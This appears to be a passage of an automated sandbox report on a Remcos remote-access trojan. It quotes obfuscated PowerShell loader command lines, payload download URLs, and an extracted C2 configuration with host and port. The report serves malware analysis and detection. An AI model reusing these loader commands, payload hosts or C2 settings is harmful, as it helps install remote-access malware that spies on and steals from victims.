bmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" , ProcessId: 612, ProcessName: wscript.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1776, TargetFilename: C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))", CommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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

                      Data Obfuscation

                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", ProcessId: 5748, ProcessName: csc.exe

                      Stealing of Sensitive Information

                      Source: Registry Key setAuthor: Joe Security: Data: Details: 0F 2C B3 20 28 7B 10 03 43 97 DA 89 0A C7 84 E1 22 AC 5F C3 43 47 94 70 47 54 74 C8 CA DD E1 F8 3C 65 4D C5 4C 76 6E C5 4D A0 FC 0C F4 E1 F4 D1 AB 9A 7D 4B 25 61 74 B5 AB FA 3C 43 45 9E 2E 6D 0B 58 63 93 89 42 45 5C 54 8C 2B 7E 3B 02 43 59 39 27 9A 2D 69 08 84 E4 FE BA DD D2 D7 7A 29 73 DB 99 1F 66 29 F5 7D E5 F2 8B 15 80 3D FF B2 88 2F E6 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 1776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-H22KKM\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T07:22:34.828568+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 104.21.84.67 | 443 | 192.168.2.6 | 49770 | TCP
2024-12-17T07:22:34.828568+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 104.21.84.67 | 443 | 192.168.2.6 | 49770 | TCP
2024-12-17T07:22:46.846421+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49781 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:22:58.336073+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49808 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:09.838732+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49837 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:21.438169+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49864 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:33.104616+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49893 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:44.734225+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49920 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:23:56.594727+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49948 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:08.295942+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49977 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:19.710724+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49995 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:31.236430+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49996 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:42.850727+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49997 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:24:54.404510+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49998 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:06.336610+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49999 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:17.732093+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50000 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:29.400873+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50001 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:40.898648+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50003 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:25:52.532172+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50004 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:26:04.034079+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50005 | 192.169.69.26 | 2430 | TCP
2024-12-17T07:22:15.219733+0100 | 2049038 | 1 | A Network Trojan was detected | 151.101.1.137 | 443 | 192.168.2.6 | 49715 | TCP
2024-12-17T07:22:35.787359+0100 | 2858295 | 1 | A Network Trojan was detected | 104.21.84.67 | 443 | 192.168.2.6 | 49770 | TCP
2024-12-17T07:22:04.164352+0100 | 2858795 | 1 | A Network Trojan was detected | 192.168.2.6 | 49707 | 74.208.80.248 | 80 | TCP
2024-12-17T07:22:34.406542+0100 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49770 | 104.21.84.67 | 443 | TCP


AV Detection

Source: kiolokgangan.duckdns.org | Avira URL Cloud: Label: malware
Source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["kiolokgangan.duckdns.org:2430:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H22KKM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | Virustotal: Detection: 27%
Source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | ReversingLabs: Detection: 13%
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: powershell.exe, 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- (memstr_d43b15b4-1)

Exploits

Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406764 _wcslen,CoGetObject

Phishing

Source: Yara match | File source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta, type: SAMPLE
Source: unknown | HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49770 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Managed | source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: $.NET CLR 3.5.30729.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Bn | source: powershell.exe, 00000003.00000002.2235367195.000000000803B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb | source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519960382.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss | source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: q:C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.pdb | source: powershell.exe, 00000003.00000002.2229203641.0000000004C97000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator | source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current | source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b | source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss | source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519960382.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current | source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed | source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: system.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskscheduler
customtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotne
Source: Binary string: dnlib.DotNet.Pdb | source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0044D5E9 FindFirstFileExA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49707 -> 74.208.80.248:80
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49781 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49808 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49837 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49864 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49893 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49920 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49948 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49995 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49999 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50004 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49998 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50000 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49997 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50001 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50005 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49996 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49977 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50003 -> 192.169.69.26:2430
Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49770
Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49770
Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49770
Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.6:49715
Source: Malware configuration extractor | URLs: kiolokgangan.duckdns.org
Source: unknown | DNS query: name: paste.ee
Source: unknown | DNS query: name: kiolokgangan.duckdns.org
Source: Yara match | File source: 8.2.powershell.exe.6445e90.1.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1 | Host: res.cloudinary.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /r/3tNKn/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 151.101.1.137
Source: Joe Sandbox View | IP Address: 104.21.84.67
Source: Joe Sandbox View | IP Address: 192.169.69.26
Source: Joe Sandbox View | ASN Name: WOWUS
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49770 -> 104.21.84.67:443
Source: global traffic | HTTP traffic detected: GET /43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 74.208.80.248 | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 74.208.80.248 (50 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_047C7A18 URLDownloadToFileW
Source: global traffic | HTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1 | Host: res.cloudinary.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /r/3tNKn/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 74.208.80.248 | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic | DNS traffic detected: DNS query: paste.ee
Source: global traffic | DNS traffic detected: DNS query: kiolokgangan.duckdns.org
Source: powershell.exe, 00000003.00000002.2229203641.0000000004C97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://74.208.80.248/43/seewhati
Source: powershell.exe, 00000003.00000002.2233063416.00000000070EF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2233063416.00000000070B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF
Source: powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFM
Source: powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFY
Source: powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFc
Source: powershell.exe, 00000003.00000002.2235184005.0000000007FDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFity
Source: powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFo
Source: powershell.exe, 00000003.00000002.2233063416.000000000708D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFtM
Source: powershell.exe, 00000003.00000002.2235184005.0000000007FDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: CasPol.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000003.00000002.2229203641.0000000004E5A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: powershell.exe, 00000003.00000002.2231208292.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
